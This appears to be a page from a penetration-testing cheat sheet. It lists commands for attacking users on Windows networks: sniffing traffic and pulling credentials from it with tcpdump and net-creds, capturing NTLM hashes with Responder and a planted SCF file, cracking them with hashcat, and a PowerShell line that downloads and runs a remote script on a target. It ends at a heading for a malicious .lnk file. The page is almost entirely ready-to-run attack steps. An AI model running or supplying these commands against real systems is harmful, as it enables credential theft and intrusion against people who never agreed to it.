23. Interacting With Users
Traffic Capture
# Wireshark (GUI)
# tcpdump (replace <interface>)
tcpdump -i <interface>
# net-creds (replace <interface> or <pcap_file>)
net-creds -i <interface>
net-creds -f <pcap_file>Process Command Lines
# PowerShell (on target)
powershell IEX (iwr 'http://10.10.10.205/procmon.ps1')SCF on File Share
# (Create @Inventory.scf with appropriate content)
# Responder (replace <interface>)
sudo responder -wrf -v -I <interface>Cracking NTLMv2 Hash
# Hashcat (replace <hash_file> and <wordlist>)
hashcat -m 5600 <hash_file> <wordlist>Malicious .lnk File (PowerShell)
Last updated